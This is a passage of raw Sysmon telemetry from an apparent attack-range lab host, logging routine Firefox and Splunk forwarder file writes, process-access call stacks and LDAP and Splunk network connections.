Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=AE535A0DCF1C16170E9DDC44306C2B27,SHA256=5A9BE83A2440541466F01B53DC384E67295751FCFE5BF524420CE252FD1B94C5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129022Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:39.593{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129021Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:39.508{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7C307197F4FC1AC4926C74938BD0E2E,SHA256=3C54F60B93DB88366B2CA4692BD41CC82148B8483ED24F58436F7DB1C4668048,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129020Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:39.177{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D7085FAA025A0633B457F557A4464AA,SHA256=263271D19A4560325D06E122526503F6D368674B7BE9E1017FC66D2FE94B4EF4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129019Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:39.062{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\social-tracking-protection-twitter-digest256.vlpsetMD5=4389884605AD56EC50BF27FBD4CFB473,SHA256=60B552CBA048738FE850BA958CDDF9B742B6FAA7519F455D4B39437734725990,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129018Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:39.062{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\social-tracking-protection-twitter-digest256.sbstoreMD5=3F92B621E1581AD764BE2EC57381AF23,SHA256=18FBBA6D350213F61DF718195FD2B38A3B8344D0A5C22C2713E6F8944E9A9DD4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129017Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:39.062{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\social-tracking-protection-linkedin-digest256.vlpsetMD5=8D76E0D31A687AE5A730C71C052C68E8,SHA256=6747A2FB92023CBF27E345AAC38B2BA7695A7DC5E9A42BD793D0CF6DAEAED260,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129016Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:39.062{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\social-tracking-protection-linkedin-digest256.sbstoreMD5=DC7308A91A03C92D7329F37F15C7AC82,SHA256=180DDE904FFF036ABD4045A52850200ACA369E4577E14E0675E5298855A6AA0C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129015Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:39.062{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\social-tracking-protection-facebook-digest256.vlpsetMD5=54971F1ADD787A9676F9DEFAB4C7FE3F,SHA256=FD890E3920CDFB62C1089C6119A8F8B713F81BDDAF7BEC925AFB4BDFB32AF5E6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129014Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:39.062{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\social-tracking-protection-facebook-digest256.sbstoreMD5=0A19E4A237D65FF069452EF5201F217E,SHA256=AC5D43328F28E2B1159D014197F58D987C2AB78C9179DCD924524353571FA604,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129013Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:39.062{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\social-track-digest256.vlpsetMD5=D95F203FEE1C8FAE222EF4C6D410971B,SHA256=1CA57763647104AEF83C8A86E8366FBBEE4BAA88C900C7AF66F437720319CEAB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129012Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:39.062{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\social-track-digest256.sbstoreMD5=C0FE3CB314FDF424A4D4F1DE2801A4DF,SHA256=C4CA8CE5B3B8D038E3348887BDA7634D1949325BB95A68D17184D2A99F37E810,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129011Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:39.062{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\mozstd-trackwhite-digest256.vlpsetMD5=8DFE079ACC2ECC3A942CEB65DC1709E6,SHA256=84744C4DC9556DF6B18041511F4041EF5478CBC29617A85D13C428E3C901C277,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129010Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:39.062{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\mozstd-trackwhite-digest256.sbstoreMD5=B044FF38498893197EFFED666AED7D02,SHA256=F8EC6AE6E979869DC88C9CE2D370E9FE6F2689A8F7C68B2392B6FF1E94AE9498,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129009Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:39.062{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\mozplugin-block-digest256.vlpsetMD5=FCC9C2C9B611A3264B68EBE180EB4248,SHA256=6ECD378A537EEFE350B45CFA353741383F407D99D776BF23155A7825DC5DD2BC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129008Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:39.062{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\mozplugin-block-digest256.sbstoreMD5=519BEB1B01FC355BB388F1F75BE997FD,SHA256=FFE2D3077B81AE6F51B220C1C661B276C823FA67DAD1D64FC5F17249FC54BDC0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129007Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:39.062{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\google4\goog-unwanted-proto.vlpsetMD5=6231B98A50E20B2BBC0B58827420B7A7,SHA256=15B4440C82A31C7F9D06B0B2515399F1838BB47428AEB03806171DC31F52F242,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129006Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:39.062{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\google4\goog-unwanted-proto.metadataMD5=15D5921377FCEF599FDE37CE6FB16C95,SHA256=5AD5FED6F96F93822D87110665DD612CDF37130CA262B7DE59D1D3A78F1B11D1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129005Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:39.062{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\google4\goog-phish-proto.vlpsetMD5=C3D8FAA23704029044A899DE157E6F60,SHA256=461D7DCA086413345180060F48C484029A0E72CBF90413EE4E05E584573B3D83,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129004Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.993{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\google4\goog-phish-proto.metadataMD5=EC78D6F150B9D41116DE7C837122C5F2,SHA256=701FF056C0B5F465F646B659D614FD8C88B0854379A4C0D8C83303246BD8D829,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035129046Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:40.991{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8408-613A-EF96-03000000C801}5520C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129045Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:40.991{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129044Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:40.991{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129043Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:40.991{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129042Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:40.991{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129041Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:40.991{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-8408-613A-EF96-03000000C801}5520C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035129040Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:40.991{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8408-613A-EF96-03000000C801}5520C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035129039Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:40.976{B81B27B7-8408-613A-EF96-03000000C801}5520C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035129038Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:05.230{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62226-false10.0.1.12-8000- 354300x800000000000000035129037Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:05.203{B81B27B7-8397-613A-DC96-03000000C801}4768C:\Windows\System32\wbem\WmiPrvSE.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.15win-host-987.attackrange.local62225-false10.0.1.14WIN-DC-128389ldap 10341000x800000000000000035129036Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:40.560{B81B27B7-8408-613A-EE96-03000000C801}51325220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035129035Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:40.529{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A30D6BFF716ED541033AE38F3367E5BB,SHA256=AD4AEF117FF9DCCED4750A60E003B7BA04096B68D7D9F0498DB9CA2AA44C403D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035129034Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:40.407{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8408-613A-EE96-03000000C801}5132C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129033Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:40.407{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129032Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:40.407{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129031Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:40.407{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129030Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:40.407{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129029Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:40.407{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-8408-613A-EE96-03000000C801}5132C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035129028Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:40.407{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8408-613A-EE96-03000000C801}5132C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program 